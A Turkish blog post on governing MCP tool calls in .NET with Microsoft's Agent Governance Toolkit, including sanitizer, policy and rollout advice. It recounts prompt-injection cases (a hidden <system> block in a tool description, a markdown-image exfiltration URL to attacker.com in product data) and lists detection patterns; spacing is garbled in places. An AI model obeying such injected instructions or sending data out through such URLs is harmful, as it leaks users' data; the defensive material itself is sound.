İçeriğe atla
Şimdi yükleniyor
AKAşkın KILIÇ
  • Anasayfa
  • Azure & Bulut
    • Microsoft Azure
    • Bulut Altyapı
    • Microsoft 365
  • Yazılım
    • DevOps
    • Geliştirici Araçları
    • Konteyner & K8s
  • AI & Veri
    • Yapay Zeka
    • Veri & Analitik
  • Güvenlik
    • Güvenlik & Kimlik
    • Kurumsal Teknoloji
  • Hakkımda
    • İletişim
×
  • Azure
  • Bulut Altyapı
  • DevOps
  • Geliştirici Araçları
  • Güvenlik & Kimlik
  • Konteyner & Kubernetes
  • Kurumsal Teknoloji
  • Microsoft 365
  • Microsoft Azure
  • Veri & Analitik
  • Yapay Zeka
  • Başlangıç
  • Yapay Zeka
  • MCP Tool Çağrılarını .NET’te Yönetmek: AGT ile Pratik Yol
Bulut Altyapı Geliştirici Araçları Yapay Zeka .NET 8, agent governance, AGT, güvenlik, MCP, prompt enjeksiyonu, tool çağrıları, YamlDotNet Aşkın KILIÇ 06/05/2026 2 Yorumlar

MCP Tool Çağrılarını .NET’te Yönetmek: AGT ile Pratik Yol

MCP Tool Çağrılarını .NET'te Yönetmek: AGT ile Pratik Yol
📑 İçindekiler
  1. GovernanceKernel: Hepsini Bağlayan Tutkal
  2. Startup mı,E nterprise mı?
  3. P ratik Başlangıç Rehberi
  4. Sıkça Sorulan Sorular
  5. AGT, MCP olmadan da çalışır mı?
  6. Performansa etkisi var mı?
  7. YAML politikalarını GitOps ile yönetebilir mıyım?
  8. AGT açık kaynak mı, ücretsiz mi?
  9. Hangi.NET sürümleri destekleniyor?
  10. Kaynaklar ve İleri Okuma

⏱️ 8 dk okuma📅 6 Mayıs 2026🔄 Güncelleme: 13 Eylül 2026

Geçen ay bir bankacılık müşterisinde garip bir şey yaşadık. Geliştiriciler, iç sistemlere bağlanan bir AI agent yazmıştı. Demo da fena görünmüyordu… ta ki biri MCP üzerinden eklenen “yardımcı” bir tool’un açıklamasına saklanmış prompt enjeksiyonunu fark edene kadar. Tool adı masumdu. Açıklamanın içinde küçük bir <system> bloğu vardı ve LLM bunu resmen talimat gibi okuyordu.

İlgili içerik: Uno Platform'un .NET, MCP ve AI ile Uygulama Üretimi

The sanitizer şu pattern’leri yakalıyor:

  • Dahili prompt injection blokları (<system>, <instructions> vb.) (bu kritik)
  • Kredi bilgisi sızıntıları — AWS keys, GitHub tokens, connection string’ler — bunu es geçmeyin
  • Dışarı veri taşıma URL pattern’leri (özellikle markdown image hack’leri: ![](https://attacker.com?data=...))
  • Kodlanmış payload’lar için Base64 kalıntıları

Daha geçen yılın sonunda bir e-ticaret müşterisinde gördüğümüz vaka tam buydu: agent ürün açıklaması çekiyordu ve açıklamalardan birinde markdown image olarak gizlenmiş exfiltration URL’si vardı. Model bunu render etmek isteyince işler çirkinleşebilirdi; neyse ki kontrol katmanımız vardı da kazaya dönmedi. AGT olsaydı açık konuşayım daha az kod yazardık.

GovernanceKernel: Hepsini Bağlayan Tutkal

Aslında — hayır dur, daha doğrusu, GovernanceKernel, yukarıdaki bileşenleri tek bir DI container’a register eden ve OpenTelemetry ile audit event’lerini publish eden ana sınıf gibi çalışıyor diyelim. Bunu Application Insights veya Azure Monitör’a bağlamak çok rahat oluyor.

Bir de KVKK boyutu var.T ool dönüşünde TC kimlik numarası,I BAN,t elefon gibi alanlar geçiyorsa,bunların maskelenmesi lazım.A GT’nın sanitizer’ı default olarak bu pattern’leri tanımıyor — Türkçe/Türkiye spesifik regex’ler eklemek gerekiyor.B en kendi TurkishPiiPatterns sınıfımı yazdım,paylaşmaya da niyetim var ileride.

Startup mı,E nterprise mı?

Küçük bir ekipseniz ve hızlı POC çıkarıyorsanız,A GT’nın tamamını kullanmak overkill olabilir.McpSecurityScannerveMcpResponseSanitizerile başlayın,sadece bunlar bile saldırı yüzeyini ciddi azaltır.T am policy engine’e geçmek zaman alır.

Enterprise tarafındaysanız tablo farklı.G overnanceKernel ‘i ortak bir paket olarak iç NuGet feed’inize koyun,büyük çoğunluk agent ekiplerinizin kullanmasını zorunlu tutun.A2A v1 ile.NET’te Çapraz Platform Agent İletişimi
ile birlikte kullanırsanız,a gent-to-agent iletişimde de aynı politika katmanı geçerli olur.

P ratik Başlangıç Rehberi

Tamam,p eki nereden başlayacağız?B enim önerim şu sırayla:

  1. d otnet add package Microsoft.AgentGovernance
    ile paketi ekleyin — test projesinde,p roduction’da değil önce.
  2. E mevcut MCP sunucularınızın tool tanımlarını
    M cpSecurityScanner

    ‘dan geçirin.R isk score’l ara bakın,şaşıracaksınız.
    (bence en önemlisi)
  3. E n riskli tool ‘lar için(delete,s end,t ransfer içerenler)Y AML policy yazın,m anual onay zorunlu kılın.
    (bu kritik)
  4. S anitizer ‘ı L LM’e dönüş yolu üzerine koyun.B urada false positive olabilir,b ir hafta gözlemleyin.

I lk haftada bir hayal kırıklığım öldü açıkçası:d ökümantasyon hâlâ ham,b azı edge case ‘ler için kod okumak gerekiyor.B u konuda
GPT-5.5 ve Microsoft Foundry : Kurumsal AI Artık Ciddi
yazısında bahsettiğim Foundry tarafının tersine,A GT henüz “şirket içi sample”lar seviyesinde.A ma yön doğru.B iraz daha pişmesi lazım.

Sıkça Sorulan Sorular

AGT, MCP olmadan da çalışır mı?

Ne yalan söyleyeyim, Şu anki sürümde asıl odak MCP üzerine. Ama hani GovernanceKernel ve policy engine aslında oldukça generic — yanı kendi tool çağrı sisteminizi yazıyorsanız, custom adapter ile bağlamak mümkün. Açıkçası dökümantasyon bu senaryo için henüz biraz zayıf kalıyor.

Performansa etkisi var mı?

Benim ölçümlerimde gateway pipeline’ı, tool çağrısı başına ortalama 8-15 ms ekliyor. Sanitizer işe dönüş boyutuna göre değişiyor — mesela 10 KB JSON için 5 ms civarında. Production’da pek fark edilmiyor, ama yüksek frekanslı agent’larda batching’i düşünmek gerekebilir bence.

YAML politikalarını GitOps ile yönetebilir mıyım?

Şöyle söyleyeyim, Evet, hatta önerilen yol da zaten bu. Politika dosyalarını ayrı bir repo’da tutun, agent uygulamasına config olarak inject edin. Değişiklikler PR ile gelsin, code review yapılsın. Bu şekilde compliance ekibi de sürece dahil olabiliyor — tecrübeme göre bu kısmı es geçmeyin.

Durun, bir saniye.

AGT açık kaynak mı, ücretsiz mi?

Şu an MIT lisanslı ve ücretsiz. Bence Microsoft’un agent ekosistemini büyütmek için attığı stratejik bir adım bu. Hani ne farkı var diyorsunuz, değil mi? İleride premium özellikler gelir mi, açıkçası bilinmez — ama core kütüphanenin MIT olarak kalacağı anlaşılıyor.

Hangi.NET sürümleri destekleniyor?

.NET 8.0 ve üzeri çalışıyor..NET Framework ya da.NET 6 desteği yok maalesef. Eğer eski bir uygulamadaysanız, agent katmanını ayrı bir.NET 8 servis olarak ayırmak en pratik çözüm bence.

Kaynaklar ve İleri Okuma

Governing MCP tool calls in.NET with the Agent Governance Toolkit (Microsoft DevBlogs)

Model Context Protocol Resmî Spesifikasyonu

Doğrusu, Microsoft Learn:.NET için AI Geliştirme Dokümantasyonu

Model Context Protocol GitHub Organizasyonu

🤖Bu yazı yapay zeka (büyük dil modelleri) ile hazırlanmış, insan editör tarafından incelenmiştir. İçerik üretim sürecimiz.
Aşkın KILIÇ
Aşkın KILIÇYazar

20+ yıl deneyimli Azure Solutions Architect. Microsoft sertifikalı bulut mimari ve DevOps danışmanı. Azure, yapay zekâ ve bulut teknolojileri üzerine Türkçe teknik içerikler üretiyor.

AZ-305AZ-104AZ-500AZ-400DP-203AI-102

İlgili Yazılar

VS Code ile SQL Şema Yönetimi Artık Akıcı: Yayın Penceresi ve Şablonlarla Tanışın
VS Code ile SQL Şema Yönetimi Artık Akıcı: Yayın Penceresi ve Şablonlarla Tanışın24 Mar 2026
.NET 11 Preview 7 Yayınlandı: Öne Çıkan Yenilikler
.NET 11 Preview 7 Yayınlandı: Öne Çıkan Yenilikler12 Ağu 2026
Agent Framework ile Kendi Claw'unu Kurmak: Saha Notları
Agent Framework ile Kendi Claw'unu Kurmak: Saha Notları30 Haz 2026
.NET ve .NET Framework Temmuz 2026 Servis Güncellemeleri
.NET ve .NET Framework Temmuz 2026 Servis Güncellemeleri19 Tem 2026

Bu içerik işinize yaradı mı?

Benzer içerikleri kaçırmamak için YouTube ve GitHub hesaplarımı takip edin.

YouTube GitHub

Haftalık Bülten

Her pazar özenle seçilmiş teknoloji yazıları doğrudan e-postanıza gelsin.

Etiket .NET 8 agent governance AGT güvenlik MCP prompt enjeksiyonu tool çağrıları YamlDotNet
Önceki yazı

GPT-5.2 ve GPT-5.2-Codex Emekli Oluyor: Şimdi Ne Olacak?

Sonraki yazı

Visual Studio’da Bulut Ajanları: Kod Akışını Değiştiren Güncelleme

İlginizi Çekebilir

Copilot Impact Dashboard'da Özellik Kullanım Kırılımı
Aşkın KILIÇ 0

Copilot Impact Dashboard’da Özellik Kullanım Kırılımı

18/09/2026
Ubuntu 26.04 Runner GA: ubuntu-latest Geçişine Hazırlık
Aşkın KILIÇ 0

Ubuntu 26.04 Runner GA: ubuntu-latest Geçişine Hazırlık

17/09/2026
GitHub Copilot Runtime'ın Rust Portu Neyi Değiştirdi
Aşkın KILIÇ 3

GitHub Copilot Runtime’ın Rust Portu Neyi Değiştirdi

17/09/2026

2 comments

comments user
Gökhan İ. 06/05/2026 12:39

Prompt enjeksiyonu meselesini çoğu zaman model seviyesinde düşünüyoruz ama governance katmanının ne kadar kritik olduğunu bu yazı güzel özetlemiş. AGT’yi daha önce duymamıştım, .NET tarafında deneyen var mı acaba? Bu arada kontrolü kaybetmeme konusuna ilginiz varsa şu yazı da benzer bir perspektif sunuyor: https://www.askinkilic.com.tr/microsoft-sovereign-private-cloud-azure-local-ile-olcek-buyu/

comments user
Tuğçe R. 06/05/2026 18:18

MCP güvenliği konusunda Türkçe kaynak bulmak gerçekten zordu, tam ihtiyacım olan yazıydı. Prompt enjeksiyonunu governance katmanıyla ele almanız özellikle dikkat çekici, bunu production ortamında denemek istiyorum. AGT’yi daha önce duymamıştım, biraz daha araştıracağım.

Yorumlar kapalı.

Yazı Ara

Takip Edin

  • Takipçi
  • Takipçi
  • Takipçi
  • Abone
  • Takipçi
  • DSC v3.3.0: Yeni Windows Kaynakları ve --what-if Desteği
    18/09/2026 DSC v3.3.0: Yeni Windows Kaynakları ve –what-if Desteği
  • Copilot Impact Dashboard'da Özellik Kullanım Kırılımı
    18/09/2026 Copilot Impact Dashboard’da Özellik Kullanım Kırılımı
  • Ubuntu 26.04 Runner GA: ubuntu-latest Geçişine Hazırlık
    17/09/2026 Ubuntu 26.04 Runner GA: ubuntu-latest Geçişine Hazırlık
  • GitHub Copilot Runtime'ın Rust Portu Neyi Değiştirdi
    17/09/2026 GitHub Copilot Runtime’ın Rust Portu Neyi Değiştirdi
  • Microsoft Agent Framework Harness ile C# Ajan Kurmak
    17/09/2026 Microsoft Agent Framework Harness ile C# Ajan Kurmak
  • Copilot Cloud Agent Metriği: Kullanımı Ölçmek Kolaylaştı
    11/04/2026 Copilot Cloud Agent Metriği: Kullanımı Ölçmek Kolaylaştı
  • GitHub Code Scanning’de Toplu Düzeltme: PR’lar Hızlandı
    07/04/2026 GitHub Code Scanning’de Toplu Düzeltme: PR’lar Hızlandı
  • MCP Apps’i Kolaylaştıran Fluent API: Sahada Ne Değişiyor?
    08/04/2026 MCP Apps’i Kolaylaştıran Fluent API: Sahada Ne Değişiyor?
  • GitHub Copilot Cloud Agent İçin Runner Kontrolü: Kurumsal Düzen
    03/04/2026 GitHub Copilot Cloud Agent İçin Runner Kontrolü: Kurumsal Düzen
  • Yapay Zekâ Çağında Sanayi Politikası: Asıl Mesela Ne?
    06/04/2026 Yapay Zekâ Çağında Sanayi Politikası: Asıl Mesela Ne?
  • GitHub Copilot Pro Denemeleri Neden Durdu?
    11/04/2026 GitHub Copilot Pro Denemeleri Neden Durduruldu?
  • vcpkg'de Paralel Kurulum ve Güvenlik Yaması: Neler Değişti?
    06/04/2026 vcpkg’de Paralel Kurulum ve Güvenlik Yaması: Neler Değişti?
  • MCP Apps’i Kolaylaştıran Fluent API: Sahada Ne Değişiyor?
    08/04/2026 MCP Apps’i Kolaylaştıran Fluent API: Sahada Ne Değişiyor?
  • Yapay Zekâ Çağında Sanayi Politikası: Asıl Mesela Ne?
    06/04/2026 Yapay Zekâ Çağında Sanayi Politikası: Asıl Mesela Ne?
  • Microsoft Foundry Mart 2026: Sahadan İlk İzlenimler
    10/04/2026 Microsoft Foundry Mart 2026: Sahadan İlk İzlenimler

SİZİN İÇİN DERLEDİK

DSC v3.3.0: Yeni Windows Kaynakları ve --what-if Desteği
DevOps Güvenlik & Kimlik Microsoft Azure

DSC v3.3.0: Yeni Windows Kaynakları ve –what-if Desteği

18/09/2026 Aşkın KILIÇ
Copilot Impact Dashboard'da Özellik Kullanım Kırılımı
Geliştirici Araçları Kurumsal Teknoloji

Copilot Impact Dashboard’da Özellik Kullanım Kırılımı

18/09/2026 Aşkın KILIÇ
Ubuntu 26.04 Runner GA: ubuntu-latest Geçişine Hazırlık
Bulut Altyapı Geliştirici Araçları

Ubuntu 26.04 Runner GA: ubuntu-latest Geçişine Hazırlık

17/09/2026 Aşkın KILIÇ
GitHub Copilot Runtime'ın Rust Portu Neyi Değiştirdi
Geliştirici Araçları Yapay Zeka

GitHub Copilot Runtime’ın Rust Portu Neyi Değiştirdi

17/09/2026 Aşkın KILIÇ
Microsoft Agent Framework Harness ile C# Ajan Kurmak
Geliştirici Araçları Microsoft Azure Yapay Zeka

Microsoft Agent Framework Harness ile C# Ajan Kurmak

17/09/2026 Aşkın KILIÇ
LLVM-libc Doğru Yuvarlamalı Matematik: Ne Değişiyor?
Geliştirici Araçları Microsoft Azure

LLVM-libc Doğru Yuvarlamalı Matematik: Ne Değişiyor?

17/09/2026 Aşkın KILIÇ
Copilot Bütçe Artış Talepleri Nasıl Yönetilir?
Kurumsal Teknoloji Microsoft Azure

Copilot Bütçe Artış Talepleri Nasıl Yönetilir?

16/09/2026 Aşkın KILIÇ
Microsoft Graph PowerShell 5.1 Desteği Ne Değişti?
Geliştirici Araçları Microsoft Azure

Microsoft Graph PowerShell 5.1 Desteği Ne Değişti?

16/09/2026 Aşkın KILIÇ
AI Kod Yazmayı Değiştirdi: Öğrenme Nasıl Değişiyor?
Geliştirici Araçları Microsoft Azure Yapay Zeka

AI Kod Yazmayı Değiştirdi: Öğrenme Nasıl Değişiyor?

16/09/2026 Aşkın KILIÇ
Kubernetes v1.37 Memory QoS Beta: Ne Değişti?
Bulut Altyapı Konteyner & Kubernetes

Kubernetes v1.37 Memory QoS Beta: Ne Değişti?

16/09/2026 Aşkın KILIÇ
GitHub Advanced Security Zorunlu Kılma: Ne Değişti?
Güvenlik & Kimlik Kurumsal Teknoloji

GitHub Advanced Security Zorunlu Kılma: Ne Değişti?

16/09/2026 Aşkın KILIÇ
Copilot Test Agent ile Test Kapsamı Nasıl Artar?
DevOps Geliştirici Araçları

Copilot Test Agent ile Test Kapsamı Nasıl Artar?

15/09/2026 Aşkın KILIÇ

Hakkımda

Aşkın KILIÇ

Microsoft Azure Çözüm Uzmanı. Bulut bilişim, yapay zekâ, DevOps ve kurumsal güvenlik üzerine yazılar yazıyorum.

Devamını Oku →

Kategoriler

  • Azure
  • Bulut Altyapı
  • DevOps
  • Geliştirici Araçları
  • Güvenlik & Kimlik
  • Konteyner & Kubernetes
  • Kurumsal Teknoloji
  • Microsoft 365
  • Microsoft Azure
  • Veri & Analitik
  • Yapay Zeka

Popüler Etiketler

AI ajanları ASP.NET Core Azure azure app service Azure Cosmos DB Azure Developer CLI Azure DevOps Azure OpenAI azure sdk Azure SQL bulut bilişim CI/CD CodeQL code review copilot Copilot CLI DevOps geliştirici verimliliği GitHub GitHub Actions GitHub Copilot güvenlik Kimlik Doğrulama Kubernetes Kurumsal geliştirme kurumsal güvenlik kurumsal yapay zeka maliyet optimizasyonu MCP Microsoft Agent Framework Microsoft Azure Microsoft Entra ID Microsoft Foundry otomasyon performans Pull Request RAG SEO uyumlu verimlilik veri yönetimi Visual Studio Visual Studio 2026 VS Code yapay zeka Yazılım geliştirme
  • Gizlilik Politikası
  • Çerez Politikası
  • Kullanım Koşulları
  • Hakkımda
  • İletişim

© 2026 Aşkın KILIÇ | Tüm hakları saklıdır. | Powered By SpiceThemes

Çerez tercihleri Zorunlu çerezler sitenin çalışması için kullanılır. Analitik çerezler yalnız açık izninizden sonra Google Analytics ve Microsoft Clarity için etkinleştirilir. KVKK ve Çerez Politikası
✉

Haftalık Bülten

Azure, DevOps ve Yapay Zeka dünyasındaki en güncel içerikleri her hafta doğrudan e-postanıza alın.

Spam yok. İstediğiniz zaman iptal edebilirsiniz.
📱
Uygulamayı Yükle Ana ekrana ekle, çevrimdışı oku
Ana Sayfa
Kategoriler
💻 Geliştirici Araçları 456 yazı 🏗️ Bulut Altyapı 370 yazı 🤖 Yapay Zeka 310 yazı 🔧 DevOps 254 yazı ☁️ Microsoft Azure 246 yazı 🔒 Güvenlik & Kimlik 209 yazı 🏢 Kurumsal Teknoloji 91 yazı 📊 Veri & Analitik 65 yazı 🐳 Konteyner & Kubernetes 59 yazı 📧 Microsoft 365 22 yazı 📁 Azure 1 yazı
Ara
Popüler
Yapay Zeka Azure Kubernetes DevOps Copilot Docker
Paylaş
WhatsApp
İçindekiler
    ← GPT-5.2 ve GPT-5.2-Codex Emekl...
    Visual Studio’da Bulut Ajanlar... →
    📩

    Gitmeden önce!

    Her pazar özenle seçilmiş teknoloji yazıları ve AI haberleri doğrudan e-postanıza gelsin. Ücretsiz, spam yok.

    🔒 Bilgileriniz güvende. İstediğiniz zaman ayrılabilirsiniz.

    📬 Haftalık bülten: Teknoloji + AI haberleri
    Beni Takip Et Yeni Azure / AI / DevOps yazılarını GitHub ve RSS üzerinden takip edin.
    GitHub RSS